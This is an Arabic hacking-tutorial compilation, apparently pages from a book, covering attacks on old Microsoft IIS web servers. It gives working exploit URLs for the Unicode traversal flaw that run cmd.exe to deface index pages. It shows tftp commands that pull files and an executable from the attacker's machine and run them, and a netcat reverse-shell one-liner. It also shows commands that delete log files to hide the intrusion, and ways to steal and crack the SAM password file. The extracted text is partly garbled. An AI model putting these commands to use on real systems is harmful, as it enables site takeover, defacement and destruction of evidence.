الاولىتحملاسم index.htm 

هناك عدةتسمیات وأختصاراتلها وهذه بعضها 

(( معظمها )) 

index.htm 

index.asp 

default.htm 

default.asp 

main.htm 

main.asp 

لنفر ضالاناننا وجدناانالصفحةالرئیسیهللموقعفي مجلدنا wwwroot هي index.htmفكی ف 

سنقوم بتغییرها وهو ما یهمناتقریبا من عملیةالاختراق هذه سنقوماولا بتغییراسمالمل ف من 

index.htm الىاياسماخر یخطر ببالك ولیكن ss.htm طبعا سنرسلالامر عبرثغرةالیونیكود من 

(( علیكانتعر فانالاوامرالتي 

المتصفحلدیك وسنقوم بتغییر الداله 

سوتضع هي نفسالاوامرالموجودهفي Dos وفي Commandفعلیكانتكون Prompt عارفابما 

هوالامر المراداستخدامه 

المهم ستكتب الثغره هكذا 

c + ren الداله cالى + dir 

: 

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+re 

n+C:\Inetpub\wwwroot\index.htm+ss.htm 

( 

وهكذافقدتمتغییراسمالصفحة من index.htmالى ss.htm 

ارأیتمكمهو سهل ‏:)؟ 

Aیبدوانكایهاالمخترقلمتكتفيباغلاقالصفحةالرئیسیهللموقعفانتتریدانتضع صفحةبموضو ع 

اخر ولیكنالموضو ع هو Hacked!!! فكی ف سنرسلهافي صفحة index.htm ؟؟ 

هناك عدة طرق ومنها سأذكر هذه الطریقه وهي عبرالاتصالبمنفذ TFTPالذي ستكونفیهانتفي 

وضعالسیرفر والموقعالذيامامك في وضعالكلاینت 

كی ف سیتم هذا ؟ 

اولاقم بتركیب نظام سیرفر TFTP على جهازك ‏(البرنامج المذكورفياولالموضو ع من افضلالبرامج 

وهناكبرنامجاخراكثراحترافا و لكن هذا یكفي 

الان ضعالسیرفرالرئیسيفي ‏\:‏Cلدیك 

قم بتصمیم صفحة خفیفه وسریعه وسمها index.htm وضعهافي 

الان نریدان نرسلللسیرفرالمل فالجدید من ‏\:‏Cلدینا الى مل ف 

لالیسالامرصعباففي نظم میكروسوفت یوجدامر ‏((هوبالأصحبرنامجا منفصلا 

وهو عباره عنكلاین تبسیط یستخدم بروتوكول TFTP وهوبروتوكولبسیط جدا جدا ‏((یسمیهالبع ض 

البروتوكولالتافه )) یقومبسحباوارسالالملفات من والىالجهاز ون حن نریدان یسحب ملفا من جهازنا 

فكیفلنا ذلك ؟ 

طبعالوكنافي غیرالیونیكودلكتبناتولیفةالامرالتالي 

C:\ 

C:\inetpub\wwwroot 

‏))یحملاسم TFTP 

: 

tftp.exe -i XXX.XXX.XXX.XXX get index.htm 

C:\inetpub\wwwroot\index.htm 

١٠٧




(( XXX.XXX.XXX.XXXتعنيايبيالسیرفرالمراد سحبالمل ف منه )) 

فيتولیفة هذاالامر یقوم الكلاین تبطلب المل ف المسمى index.htmلیضعهفي جهازهفي المجلد 

wwwroot 

ولكن لاتنسىفشكلتولیفةالاوامر یختل ف منالوضعالعادي عن وضعالیونیكودفما هو الحل ؟ 

الحل هوانتحولتولیفةالامرالى یونیكود لتضعهفيالثغرهالتيلدیك 

بعدت حویلالامرالى یونیكود سیصبح شكلهكالتالي 

: 

tftp.exe+"- 

i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm 

یاللروعهلقدتجاوزناالعقبهبالفعل :) 

الانقم بتشغیل سیرفرال TFTP وقم بتجهیز مل ف ال index.htm 

وقمبالاتصال مع الموقع عبرثغرةالیونیكود المضا فالیها هذهالتولیفهلیصبحفيالنهایه على هذا النحو 

: 

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t 

ftp.exe+"- 

i"+XXX.XXX.XXX.XXX+GET+index.htm+C:\Inetpub\wwwroot\index.htm 

وهكذاقمنا بتحمیلالصفحةالىالانترنت وانتیهنا من عملیةالاختراق ‏((تقریبا :) )) 

ملحوظه ‏:یمكنكانتقوم بتحمیل ملفات EXEایضاوتشغیلها علىالسیرفربنفسالاسلوب وهذا مثال 

لنفر ضاننا نریدتحمیل مل ف EXE علىالسیرفر وسمیناه hunter.exe ونریدتشغیلهفكی فلنا ذلك ؟ 

سنتبعالاتي 

نقوم بتحمیلالمل ف علىالسیرفركماقمنا بتحمیل index.htm ونضعهفي ‏\:‏Cللسیرفر عبر هذه 

التولیفه 

: 

: 

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+t 

ftp.exe+"-i"+XXX.XXX.XXX.XXX+GET+hunter.exe+C:\hunter.exe 

: 

بعدانیتمتحمیل المل ف سنشغله عبرتنفیذ هذاالامر 

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../hunter.exe 

او عن طریق هذاالامر 

/msadc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+ 

hunter.exe 

log.* 

: 

الآ ن وقدقاربنا علىالانتهاء بقيلدینافيالسیرفر عمل واحدفقطالا وهو مسح ملفاتاللوج 

وسیكون ذلك عن طریق هذاالامر 

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d 

el+C:\*.log/s 

هناكانواعاخرى منالملفاتیتمتخزینفیها بع ضالمعلومات ویفضل مسحهاایضا وهي مثلالملفات ذات 

الامتداد tmp 

: 

/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+d 

el+C:\*.tmp/s 

وهذاامر مسحها عبرالیونیكود 

١٠٨




ایضا ملحوظه مهمه وهيان لاتبقىايمعلومات عنكفيالسیرفركما یفعل البع ض بذكراسمائهماو 

ایمیلاتهمالحقیقیهقمبمسحاي شيء یدل علیكاو على عملیةالاختراق حاولانتصل الى هذا 

المستو ى 

هناك عدد منالاشیاء والا فكارلن اتطرقالیها مثلارسالفایروس مااوامر على مل ف bat حتى تتمكن 

من وضع مشكلهكبیرهفيالسیرفرلكيلایعمل 

اوانترسلفایروس یقومبمحو جمیع ملفاتالنظاماوانتمرز نفسكلدیهمفيالسیرفر عن طریقبرامج 

التحكم عن بعد واخفائهابشكل جیدفيالمجلدات ذات الملفاتالكثیر مثل 

)) 

)) )) system32 والكثیر 

الكثیر 

 

(( 

ملحوظات ‏:لنتعمل هذه الثغرهفيكل الحالاتفهناك بع ضالسیرفرات یقومون بقطعالطریق علیك عن 

طریق مسح مل ف tftp من سیرفراتهم 

) المل فالمسؤول عن ذلك موجودفيالمجلد (system32 وبع ضالسیرفراتقامت بعملیةالترقیع 

اصدرت میكروسوفتترقیعالهذهالثغره 

وبعضهمقد یكون واضعفایر وول یقومبمراقبةالباكیجالصادر والوارد وقد یقوم بعملاصطیادلمثل هذه 

العملیات 

واخرون یقومون بتركیببرنامج الحمایهالقوي جدافي نظم IISالا وهو Secure IIS من شركة 

)) 

(( 

Eeye 

والعدیدالعدید من العقبات ولكن عند كتابة هذاالموضو ع ‏((قبل حوالياربعةاشهر ‏))كان ما یقارب 

منالسیرفراتالتيفیها نظام IIS 

تحوي هذهالثغره وبدونترقیع (( لعدم وجوده وقتها ‏))اولأهمال المدیر.‏ 

٩٠ 

% 

١٠٩




" 

الدلیل الكامل لإختراق سيرفر 

" IIS 

$$$$$$$$$$$$ 

الكاتب DEMON: 

$$$$$$$$$$$$ 

---------- 

- : 

--------- 

مقدمة 

.. 

. 

یعلمالجمیع مد ىانتشار سیرفرات IIS حیثتشكل النسبةالاكبر المستخدمةفيتشغیل مواقعالانترنت 

ویعلمالجمیع مد ىضع ف الناحیةالامنیةلهذهالسیرفرات ‏..لذاقررتالقیامبجمعاشهرثغرات هذاالنو ع 

معتوضیحكیفیة عملها 

--------- 

- : 

--------- 

ملاحظة 

معظم الطرق الموجودة هناتعمل على سیرفرات IIS4.0 و IIS5.0 وجمیعهاتعتمد علىالبورت 

یعني من خلالالمتصفح))‏ . 

((٨٠ 

------------- 

- : 

------------- 

-١ CGI-Scanner جید 

) www.wiretrip.net/rfp 

المتطلبات 

‏..أناافضل)‏ Whiskerیمكنكتنزیله من هذا الموقع 

٢- اكتی فبیرل لتشغیل ملفاتالبیرل ‏(یمكنكتنزیله منالموقع:‏ 

اي نو ع)‏ 

( http://www.activestate.com/ 

: 

-٣ ویب سیرفر ) اباتشياو .. IIS 

----------------------- 

IIS Hack.exe : - 

------------------------ 

اكتش ف خبراءالامنفي شركة eEyeثغرةامنیةتسمحلك بتحمیل نسخه ذكیة من nc.exe وجعلها 

تنصت على المنفذ 

وهذا سیعطیك 

منالموقع 

ویجبتشغیل ویب سیرفرفي جهازكقبلتنفیذالثغرة 

قمبنسخاداة nc.exeوضعهافيالدلیلالرئیسيللویب سیرفرلدیك 

.. ٨٠ 

سطراوامر cmde.exe معامتیازات . Administrator 

بامكانكانزال NC.exe و . http://www.technotronic.com/ IIS Hack.exe 

.. 

‏(فياباتشي Htdocs) وفي IIS 

الدلیل . wwwroot 

ثمقم بتشغیل : IISHack.exe 

80 your_IP/ncx.exe http://www.target.com/c:\>iishack.exe 

وبعد اتمام الخطوة السابقةبنجاح 

: 

eGG SheLL وستجدامامك http://www.target.com/c:\>nc 

١١٠




ملاحظة ‏:تعمل هذه الثغرة على سیرفرات IIS4.0‎فقط 

‏((اذالمیتمتركیبالرقعه))‏ . 

do you want me to explain what to do next, hey common you must be 

kidding 

...hehe.... 

.. 

%٤٠ 

) 

----------------------- 

MDAC = RDS :- 

----------------------- 

اعتقدانهاثغرةقدیمةقلیلا لكني ما زلتارىان من المواقعتعاني منها 

تسمحلك هذهالثغرة بتشغیلاوامرك علىالنظامالهد فبشكلم حلي سیتمتشغیل وامركبصفتك مستخدم 

SYSTEMايبصلاحیات مدیر النظام .. على العموماذااردتمعرفةاذا ماكان النظام مصابابهذه 

الثغرةام لا 

.. 

.. 

قماولابالاتصالبالنظامالهد ف ‎80‎ثمقمبارسال http://www.host.com/ : c:\>nc -nw -w 2 

الامر : GET /msadc/msadcs.dll HTTP 

.. (( 

(( www.wiretrip.net/rfp : 

mdac.pl - msadc2.pl )) v 

c:\> mdac.pl -h host.com 

Please type the NT commandline you want to run (cmd /c assumed):\n 

cmd /c 

فإ ذاكانالرد application/x_varg ‏:فهذایعنيان النظام مصاب ‏((اذالمیتمترقیعه 

بامكانكایجاد سكربتا تبیرلتسهل علیك العملفي هذا الموقع 

إ ذااردتتغییرالصفحهالرئیسیة ما علیكالاتنفیذ 

الامر > hehe : echo hacked by me 

C:\inetpub\wwwroot\index.htm 

وإ ذاأردنااحكام السیطرة على الموقعبامكانناتحمیل Hacker'sاقصد Swiss knife Army 

بواسطة هذاالامر 

: 

Nc.exe 

%systemroot%&&tftp -i YourIP GET nc.exe&&del ftptmp&& attrib -r 

nc.exe&&nc.exe -l -p 80 -t -e cmd.exe 

) 

قم بقراءةالامر منالیسار الىالیمین لت مكن منقراءته جیدا)‏ 

بعدهاقمبالاتصالبالنظامالهد ف على المنفذ ٨٠ وستجد سطراوامر معامتیازات . Administrator 

------------------------------------------------- 

Codebrws.asp & Showcode.asp :- 

-------------------------------------------------- 

.. 

الملفان عبارة عنقاريء ملفات ASP یأتي مع IIS ولكنه لا یأتي محملافتراضیابل یجب على مدیر 

النظامتفعیله 

فإ ذاكانت هذهالخدمة مفعلة ستسفید منهاكثیراقهيتسمحلك بقراءةاي مل ف))‏ .asp اعني رؤیة 

المصدر))‏ . 

: (( 

http://www.victim.com/msadc/samples...nt/repair/sam._ 

باستخدام هذاالامر ست حصل على مل فالسام ‏((اذاكان النظام مصابا 

بعد ال حصول على مل فالسام .. it Expandباستخدامالاداة it & Crack المفضلةلدي)‏ LC3.0 

سیتمكسرهافياقل من 

٢٤ ساعه ( . 

١١١




---------------- 

Null.htw : - 

---------------- 

عملیة شر حكیفیة عمل هذه الثغرةمعقدقلیلا ‏..لذا سأكتفيفقطبطریقةالاستفادة منها 

باختصارتسمحلكبرؤیةالسورسكود لاي مل ف .. ASP 

لتنفیذ الثغرة:‏ 

سیعر ضلك هذا الراب طالسورسكودالخا صبالصفحه . Default.asp 

.. 

http://www.victim.com/null.htw?CiWe...HiliteType=full 

------------------------------ 

webhits.dll & .htw : - 

------------------------------ 

http://www.victim.com/blabla.htw : 

فإ ذاكانالردبهذه العبارة format of the QUERY_STRING is invalid ‏:فهذایعنيان 

. %٩٠ 

: 

www.victim.com/xxxxxxxxx/xxxxxxxx/x...hilitetype=full 

اولاقم بتجربة اللنك على النظامالهد ف 

النظام الهد ف مصاببنسبة 

اخیرا جربتنفیذالثغرةبهذهالطریقة 

معتغییرال XXXXX/XXXXX/XXXX/XXX.htwباحد هذهالملحقات ، وبالتأكید سیعملاحدها 

iissamples/issamples/oop/qfullhit.htw 

iissamples/issamples/oop/qsumrhit.htw 

isssamples/exair/search/qfullhit.htw 

isssamples/exair/search/qsumrhit.htw 

وبالتالي ست حصل على مل فالسامقم بكسرهبواسطهالاداة .. LC3 

: 

------------------------------------------------------- 

[$DATA] ASP Alternate Data Streams:- 

------------------------------------------------------- 

هذه الثغرةكانتبدایتها منذالعام .. ١٩٩٨ وهي مخصصةبالتحدیدلسیرفرا ت IIS3.0 والانتعمل على 

بع ض سیرفرات .. IIS4.0 

ومهمتها عر ض السورسكود لاي صفحه (( البع ضیتساءل مالفائدة من عر ض سورسالصفحه ؟؟ 

الاجابةان بع ضالصفحاتتحتوي على معلومات مهمة مثلكلمات مرورقواعدالبیانات مثل 

(( 

Global.asa 

یمكنتنفیذالثغرة منالمتصفحبواسطة هذا الأمر 

http://www.victim.com/default.asp:: 

$DATA 

١١٢




----------------------- 

ASP dot bug : - 

----------------------- 

ربمااقدمثغرةفي هذاالن ص هي هذهالثغرة حی ثتقومایضا بعر ض السورسكودالخا ص بأي صفحه 

.. 

: 

حیثتم اكتشافهافيالعام .. ١٩٩٧ 

ویتمتنفیذها منالمتصفحبهذا الشكل 

‏.‏http://www.victim.com/sample.aspلاحظ النقطة الموجودةفياخر السطر 

وهيفق طتعمل على سیرفرات . IIS3.0 

.. 

------------------------------------------- 

ISM.DLL Buffer Truncation : - 

------------------------------------------- 

.. 

خطأبرمجي یسمحللمهاجمبسحب الملفات ورؤویةالسورسكودایضا 

وفكرة الثغرة هيالتحایل علىالسیرفربإیهامهانناقمنا یطلب مل ف ما .. وفيالحقیقة ن حن نقومبطلب 

ملفاخر 

المل ف المسؤوول عن هذا الخطأ هو ISM.dll حی ثیتمتحمیله بعددكبیر منالرموز المسافة (% ٢٠ ) 

Space . 

: 

(...




---------------- 

site.csc : - 

---------------- 

تمكنك هذه الثغرة منمعرفةمعلومات مهمة عن ال DNS الخا صبالموقعبمافي ذلك DSN, UID 

… 

and PASS Database .. 

الثغرة : http://www.victim.com/adsamples/config/site.csc 

سیقوم المهاجمبانزالالمل فالمذكور ‏..وسی حصل علىمعلوما تقیمة وهامةأیضا 

١١٤



:: 


$$$$$$$$$$$$$$$$$$$ 


$$$$$$$$$$$$$$$$$$$ 

‏"دراسة مفصلة وبعمق في الUniCode‏"‏ 

السلام علیكم ورحمهاالله وبركاته 

ازیكم شبابایهاخباركمكلكم؟ اتمنىتكونوابخیرو.‏ 

اعذرونى على غیبتى وانقطاعى عنكم ولكن واالله ظ رو ف رهیبه 

و الان خلونا نر غىفى شویهكلامفاضى على رأىبروكن 

كنت اتصفحالانترنت وادعبث شو ىو بعدین جمعت بع ض من المعلومات من ملفات مختلفه و هى تتحد ث 

عنالیونىكود ) طبعا الانمعظمكم سیستعجل و یقول یاههههه یونىكودقدیمه الخ 

اصبرلقد ذكرتالیونىكودفى المنتدیاتثلا ث مرات مره عنالصدیقبلاكهنتر و مره من الا خ هكس و 

مره عنالصدیق دیموناوابو خلودلكن هذه المره صدقونى ستكون مختلفهتمامالاختلا ف عن المرات 

( ولكنانااقوله 

.... 

السابقه(‏ (Trust Me 

والان دعونا منهاالخرابیط و 

خلونا نقولالدرس یمكنیعجبكم::‏ 

 

متى وجدتالیونىكود؟ 

Found On 15 May 2001 BY NSFOCUS 

السیستیمزالتى تتأثربالثغره هى::‏ 

All running IIS 4 / IIS 5 web server 

Windows 2k 

Windows 2k SP1 + SP2 

ثغرهالیونىكود ‏::هى عباره عنثغرهتسمحللهاكر بأن یشغلاوامربالقوهبصلاحیه مسموحبها 

یكونلهام 

‏(اى 

تیاز(‏ IUSR_machinename account 

وتحد ث هذهالثغرهاصلانتیجهان روتینال cgi الموجود على الویب سرفر نفسه یفك شفره عنوان 

الموقع مرتین و هذا ما نسمیهبال )DeCode لاتقلق ستفهم بعد ذلك 

( 

تعالىمعى 

خلینىاوض حلكایهالخرابی ط الىاناكاتبهافوقد ى 

ولیكن مثلا :: 

http://iisserver/scripts/..%5c..%...md.exe?/c+dir+c ‏




سرفر وبالتحدید هذاالفولدریسمى الفولدر التنفیذىاى(‏ executable directory 

و طبعا هذاالفولدرلیسلهاسمثابت هذافق ط مثال ولكن یمكنان یكونلهاسماءكثیره علىالملقم iis و 

ملحوظههامه::لا یوجد علىكل ملقم iis هذاالفولدرالتنفیذىاى executable directory 

واعتقدانالصدیقبلاك هنتر والا خ هك سقد ذكرومعظماسامى هذه الدیریكتورزفى شرحهم 

انارب طالدروس مع بع ض حتىتكون سلسله متكامله 

) فأناارید 

( 

؟ * 


( 



هو مكتوبامامى ولكنتقدرتقولانهاالاوامر التىتأخذ فتره طویله حبتین مثل ping مثلا 

و مثلاهناك argumentأخر مثل Q/ و هذا نستخدمهفىاغلاقتفعیلامر echoكما هو واضحفى 

المثالفوق 

و هناكالكثیر من هذهال arguments و طبعا منها ما هواساسى لا یمكنكالتحكمفیه ‏(یعنى فتحهاو 

غلقه مثلال c‏/وال ) k/ و هناكاخرین یمكنكانتجعلهم on او off وبهذاتكونانت تتحكمبحالهال 

خاصتك ‏(یاری تتنفذالامر وتقرأالمكتوب لانك راحتلاقىتفاصیل الفتح والغلقبالتفصیل 

اصبروا علىقلیلا حتىانتهى منالامتحانالاولفى MCSEفى خلالاسبوعینان شاءااللهتعالى و بعد 

ذلكنعود اكثرقوه و نشرحلكم هذه النقطهبالتفصیلان شاءااللهبساصبرو شو ى 

اعتقدانكالانفهمت ما هىال arguments و مافائده c/ التىتكتبهافىالثغره وانا متأكدانك لا 

تعر فمعناها . 

تعالو نروحلنقطه سهله وبسیطه جداا فىالثغره ‏،ان تتشغلال cmd.exeلانكتریدان تتحكمبالموقع 

وتغیرالاندكس والخ و ولكنتعالى مثلا نشغلاى مل فتانى یاترىكی ف نشغله ؟ 

انا راحاقلككی ف ‏::كل ما علیك فعله هوانتقومبوضعاسم الفایلالذىتریدتشغیلهبهذا الشكل 

بلا من cmd.exe?/c وبهذاتكونقد شغلتالفایل الذىتریده 

حیثتصبحالثغرهبهذاالشكل 

( و 

cmd 

Ping.exe+PRINT 

:: 

( enjoy this ) . 

http://issserver/scripts/..%5c..%.../ping.exe+PRINT 

- +c/ ‏*وبالتالىكما عرفنافوقانا c‏/هىال argumentلل cmd.exeاوالحالهالتى سینفذ علیها 

الامراما علامهال ‏+التىبجانبال c‏/فهىبمقامالمسافهبین الكلمتینفىالثغره ولكن لا 

یمكننااسبدالهابمسافه عادیهو بعدها یكونالامر الذ ىیحمله سطرالاوامرلینفدهثم علامه ‏+ثانیه و 

بعدهااسم الدرای فالذ ىتعر ض محتویاته علىالشاشه حالیا 

. 

:: 

ال cmd 

‏**و نأتىالان لاهم نقطهفىالثغره و هىاساسا سبب الثغرهكما ذكرنافىاولالكلام ‏(هوان سببالثغره 

یكون حل شفرهالعنواناكثر من مره ‏)و هذا ما نطلق علیهال decodeوانا شخصیاافصلالدیكودز على 

انهت حلیل حتى نصل لابس ط الحلكمافىالریاضیاتیعنى simplyfiey ا ىتبسیط وفك المعادلهتعالو 

خلینا نفهمكم هذا على الثغره نفسها 

‎255c..%255c‏%../هذاهو الدیكودا ىالت حلیلللاصل /.... 

ولكن ماالذى نحاولان نفعلهبهذهالت حلیلات الغریبه ؟ 

فن حن بذلكنحاولان ن حسن و نلعبفى مسارات الدیریكتورز ولكنللاسف لا یمكنكتغییراو اللعبفى 

الدیریكتورز لانال iis مزودبخاصیه عمل check على مثل هذهالدیكودز و منعها من التنفیذ و هنا یقع 

اصلثغرهالیونىكود و هوالت حلیللمرتیناو لاكثر من مرهفهمتمقصد ىالاناىانال iis مزود فعلا 

بخاصیهال check على هذهالدیكودز ولكنانتتضع الثغره وبها اكثر منت حلیل واحدلنف ساسم 

الموقع ولذلك یقومال iisبوظیفته المعتاده و هىال check و المنع علىالدیكودالاول و یظهرلهان 

كل شئبخیر وانهیسیطر علىالموق ف خخخخخخخخ ولكن الحقیقهانهیعملال checkمره واحده 

فتكونالنتیجهانالدیكودالثانى ینجحتمامافى محاولهاللعبفىالدیریكتورز وبالتالى یكوننتیجه الدیكود 

الثانى هوان یرجعالىاصله ا ى(‏ (slash / 

وتعالو ندخل ونتعمق اكثرفىتفاصیلالدیكودللثغره بعدان عرفنافكرتها :: 

شوفوفیه مادهاسمها computer logic و الماده د ى راح درسفیها شئ یسمى HexaDecimal 

Valuesو هذهال valuesهىاساس الدیكود الذ ى نفعلهفىالثغرهاىانكل حر ف ص حیحاو حركه 

مثل ‏/فى الكمبیوترلها ما یسمىبال hexتعالىاوض value حلكاكثر 

:: 

١١٧




مثلا:‏ % ‎٢٠‎تعنى مسافه(‏space‏)‏ 

هذا مثالبسیط واعتقدانكفهمتالانكلامى و طبعا یوجد جدوللهذهال hex values المساویه 

للحرو ف والحركاتالعادیهفى الكمبیوتر 

عوضا عنالحرو ف و الحركات العادیه الى السرفر و هذابالضبط ما نسمیهالت حلیلاوفك الشفرهاوال 

‏،اذناعتقدانكادركتتماماالانانكترسل hex values 

:: 

decode 

تعالى نخ شفىتفاصیل الثغره اكثر و سنأخذالحركه التى نشرح علیها هىال ) (slash / حیثانها من 

اساسیات الدیكودفى هذهالثغره 

شو ففى جدولال hex value راح نجدانال 

فىانكتحذ فال ‏/وتضعبدلا منها هذا فتنجحالثغره ولكنانااقوللك هذا خطأ لان هذاهو 

الدیقودالاول وانا ذكر تانالدیكود یحد ث مرتیناو ممكناكثریعنىلو وضعت هذا الدیكودالاولفستجد 

انال iisلدیهالقدره علىان یمسك هذاالدیكود و یمكنعه منالتنفیذ ولذلك علیناانن حلل هذاال value 

حتىیتمالدیكودالتانى فتنجحالثغره 

وبالنظر الى جدولال hexadecimal values شو ف نجد هذا 

/ = ٥% , c طبعا هذاهوالدیكودالاولالذ ى ستفكرالان 

ال value 

:: 

% = %25 

5 = %35 

c = %63 

ثم 

وبالتالى نجدانفسناقد خدعناال iisبأننا checker حللناال شفره مرتین وبالتالىفسن حصلفى 

المقابل علىالاصل و هو / وبالتالىتكونقد نجحت الثغره 

. 

فهمتمالان شبابمعنى دیكودالعنوان مرتین وفهمتماساس الثغره والدیكود مرتینلیسمعناهتكرار 

الت حلیلالاول مرتین ولكنمعناهت حلیل وفكالت حلیلالاولا ى simplify الى ابسط واطول صوره ممكنه 

فى نفسالوقت 

و عشانتوضح اكثرمعك راحاحطلككی ف التركیبهالصحللت حلیل 

:: 

%255c %25 = % 5 = 5 c = c = %5c 

%%35c % = % %35 = 5 c = c = %5c 

%%35%63 % = % %35 = 5 %63 = c = %5c 

%25%35%63 %25 = % %35 = 5 %63 = c = %5c 

c =/٥% : 

ارائیتمالت حلیل طبعافىالاخر یجبانیساو ىالدیكودالاصل و هوكما هة واضحفى مثالناكلالت حلیلات 

تساو ى %٥ cوكما ذكرنا / = %5c ولكننا حللنا هذاالرمزالىاطول وابسطت حلیل حتى نخدعال iis 

checker . 

وفى النهایه بعدفهمناللثغره واساسهاهیاتعالو نطبقها مع بع 

سو ف نضع الثغرهفى هذاالشكل 

ض 

:: 

http://iisserver/scripts/..%5c..%...xe?/c+dir+c:+/s 

و ستدخلون علىالموقعبنجاح ولكن اكیدتلاحظون شئ جدیدقد زاد على الثغره و هذاالشىهوs‏/+‏ 

١١٨


هذا الرمز 

و عندماتدمج هذا الرمز معالثغرهكمافى المثال السابق سو فتأتیكلسته بكلفایلكبیر و صغیرفى 

كمبیوترالویب سرفر 

وااللهتعبتفى هذاالدرسوتعبتفىقرائهالمعلومات وتجمیعها عنالیونىكود حتىاصللهذاالشكل 

الاخوه وان شاءااللهانتظرو موضوعى القادم بعدمااكونانهی تامتحانىالاولفى)‏ MCSE ادعولى 

اختراقها وفائدهال 

بالنجاح ( و سیكون عباره عنتلخی صللتعامل مع شبكات ویندوز 

٢٠٠٠ وكیفیه 

....WIN2000 RESOURCE KIT 

١١٩




" 

تدریب على عملیة الإختراق بواسطة الیونیكود 

" 

: 

$$$$$$$$$$$$$$$$$ 

الكاتب:‏ MaXhAk2000 

$$$$$$$$$$$$$$$$$ 

بسماالله الرحمن الرحیم..‏ 

كثرالكلام عن إختراقالمواقع بأنواعه والیوم عندي شرح عن ا لإختراق عن طریق الیونیكودأوبالأصح 

تطبیق عملي علىكیفیة ا لإختراق عن طریقالیونیكود وهذاالنو ع یعتبرللمبتدئین وهو الذيبإذنا الله 

سیوصلهمإلى طریق ا لإحترا ف.....‏ 

*************************************************************************************** 

بسماالله نبدأ...‏ 

سیكونالتطبیق على جهازك وهو مثل الموقعأوالسیرفروتقوم بتطبیق الدرسكما وأنك على موقع 

مصاب.....‏ 

لكيتتدرب علىإخت راقالمواقعقم بتركیب نظام ویندوز‎٢٠٠٠‎ على جهازك . وفي نفسالسیديتبعالنظام 

تقومبإ ضافة سیرفر IIS وذلك عن طریق 

قمبالذهابإلىلوحة التحكم.‏ 

قمبالنقر علىإ ضافةإزالةبرامج.‏ 

قمبالنقر على زر ‏"إ ضافةإزالة مكونات ویندوز 

قمبوضع علامة صح علىا 

هذابالنسبةلكیفیةتنزیلالسیرفر..‏ 

اما عنكیفیةالتدرب على الجهازأياختراقهفقمبالتالي: 

قمبوضعالموقعفي مجلد wwwroot الموجود داخل مجلد Inetpub طبعا هتدخل علیه بعد ماتشغل 

السیرفر IIS عن طریق 

http://127.0.0.1/ 

ولإیجاد الثغرةفيالجهاز والتدرب علیهاقم بتشغیلبرنامج عمران سكانأوأيبرنامجاخرللفح ص عن 

الثغراتتبعالیونیكود وقمبوضع العنوانتبعكاليهو 

وقم بتطبیقالمهاراتالتيتعلمتهافياختراق المواقعالمصابةبالیونیكود...‏ 

http://127.0.0.1/ 

." 

لخیار الأول.‏ IIS” “ 

* ١ 

* ٢ 

* ٣ 

* ٤ 

١ ٢٠


درس مفصل عن الكوكیز 

" 

" 


$$$$$$$$$$$$$ 

الكاتب Girl: Linux 

$$$$$$$$$$$$$ 

مقدمة ‏: 

^^^^^^ 

منالوسائلالمفیدةفيانشاء مواقعاكثرتفاعلیة ‏،فبواسطتها ست مكن من 

تعدالكعكات ‏(لا 

معرفة هلقامالمتصفح بزیارة موقعك منقبلاملا..‏ 

cookies ) 

١- 

في هذا الدرس سنتعر ف علىالكعكا ت وكیف یمكننااستخدامها...‏ 

اقسام الدرس:‏ 

معلومات عامة . 

‎٢‎‏-زراعةالكعكات على جهاز العمیل . 

٣ ‏-قراءةالكعكات من جهازالعمیل 

‎٤‎‏-تطبیق ‏:تخصی صلونالخلفیة.‏ 

 

معلومات عامة 

^^^^^^^^ 

. 

‏-ماهي ملفاتالكوكیز ؟ 

^^^^^^^^^^^^^^ 

ملفاتالكوكیز عبارة عن ملفات نصیة ‏،تقومالمواقع التيتزورهابإیداعها علىالقر صالصلبفي 

جهازك،‏ وتحتوي هذهالملفاتالنصیة علىمعلوماتتتیحللموقعالذيأودعهاأن یسترجعها عندالحاجة ، 

أي عند زیارتكالمقبلةللموقع . 

وتختل فالمعلوماتالتيتخزن ضمن ملفات الكوكیز من موقع لآخر ، ولكنلیس بإ مكان هذهالمواقع 

استرجا عأيمعلوماتإ ضافیة عنكأو عن جهازك ‏،باستثناءتلكالمعلوماتالمخزنةفيالمل فالنصي 

الخا صبها ، والتيتمإرسالها منقبلالموقع ، وبذلك لاتستطیع هذهالمواقعالاطلا ع على مضمون ملفات 

الكوكیزالأخرى ‏،أوأي ملفات خاصة على جهازك . 

‏-كی فیتمإیدا ع ملفات الكوكیز على جهازك ؟ 

یرسلالمتصفح ، عندإدخالك عنوان موقعفي شری ط العناوین ، طلباًإلىالموقعالذي حددته،‏ متضمناً‏ 

عنوان IP الخا صبه ، ونو عالمتصفحالذيتستخدمه ، ونظامالتشغیل الذي یدیر جهازك ‏.تخزّ‏ ن هذه 

المعلوماتفي ملفات خاصةبالمزود ، Files Log ولا علاقةللكوكیزبالمعلوماتالتيیتمإرسالها 

الوقت ذاته یبح ثالمتصفح عن ملفاتكوكیز ، التيتخ ص الموقعالمطلوب ‏،فإ ذا وجدهایتمإرسالها مع 

طلب مشاهدةالموقع ، وإ ذالمتوجد ‏،فإ نالموقع سیدركأن هذه زیارتك الأولىإلیه ‏،فیقومبإرسال ملفات 

الكوكیزإلى جهازك لتخزن علیه . 

. وفي 

١٢١




وبإ مكانالموقعتغییرالمعلوماتالموجودة ضمن ملفاتالكوكیزأوإ ضافةمعلومات جدیدةكلماقمت بزیارة 

الموقع ‏.یتمتخزین بع ض ملفاتالكوكیزفي الذاكرةفقط ‏،ب حیث یجري حذفها مباشرة عندإغ لاقك 

المتصفح ، ولكنمعظمهاوتسمى ‏"ملفاتالكوكیزالمثابرة"‏ ‏،یتمتخزینهالفترة محددة علىالقر صالصلب 

ل حینانتهاء صلاحیتها وقدتدوم صلاحیتها مدةأشهرأو حتى سنوات ‏.أما بع ض ملفا تالكوكیزالتي 

تعر ضتاریخ صلاحیة لتاریخ سابق ‏،فإنهاتُ‏ حذ ف مباشرة ولاتُ‏ خز َّن علىقرصكالصلب 

المعلوماتالمخزنةفي ملفاتالكوكیزإلىمزودات الموقع الذيأصدرهافق ط،‏ وقدتعمم بع ضالشركات 

